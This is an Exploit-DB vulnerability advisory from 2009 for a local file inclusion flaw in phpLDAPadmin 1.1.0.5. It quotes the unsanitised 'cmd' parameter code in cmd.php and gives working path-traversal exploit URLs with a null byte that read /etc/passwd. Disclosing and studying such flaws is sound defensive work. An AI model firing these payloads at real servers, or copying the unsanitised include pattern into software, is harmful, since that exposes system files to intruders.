exploit-db-mirror/exploits/php/webapps/10410.txt

########################################################################
#		PHPLDAPADMIN LOCAL FILE INCLUSION
########################################################################

author	: ipsecs
website	: http://ipsecs.com
Date		: December, 10th, 2009


-[i]- Description

"Phpldapadmin is web based LDAP client which provides easy,
anywhere-accessible, multi-language administration for LDAP
server."
http://phpldapadmin.sourceforge.net

vulnerable version:
phpldapadmin 1.1.0.5
Ubuntu 8.10
Debian 5.0
Other version may be affected

-[ii]- Vulnerable Code

Vulnerable code is found in cmd.php which doesn't sanitize
URI parameter provided by user input.

line 10
$www['cmd'] = get_request('cmd','REQUEST');

line 22-27
if (defined('HOOKSDIR') && file_exists(HOOKSDIR.$www['cmd'].'.php'))
       $file = HOOKSDIR.$www['cmd'].'.php';

elseif (defined('HTDOCDIR') && file_exists(HTDOCDIR.$www['cmd'].'.php'))
       $file = HTDOCDIR.$www['cmd'].'.php';

line 38-39
if ($file)
       include $file;

Attacker may view any arbitrary files trough 'cmd' parameter
in URI request.

-[iii]- Exploit

http://server/phpldapadmin/cmd.php?cmd=../../../../etc/passwd%00
http://server/phpldapadmin/cmd.php?cmd=../../../../issue%00

-[iv]- Fix

Sanitize $file before being included. Unfortunaltely there is
no working patch at this time.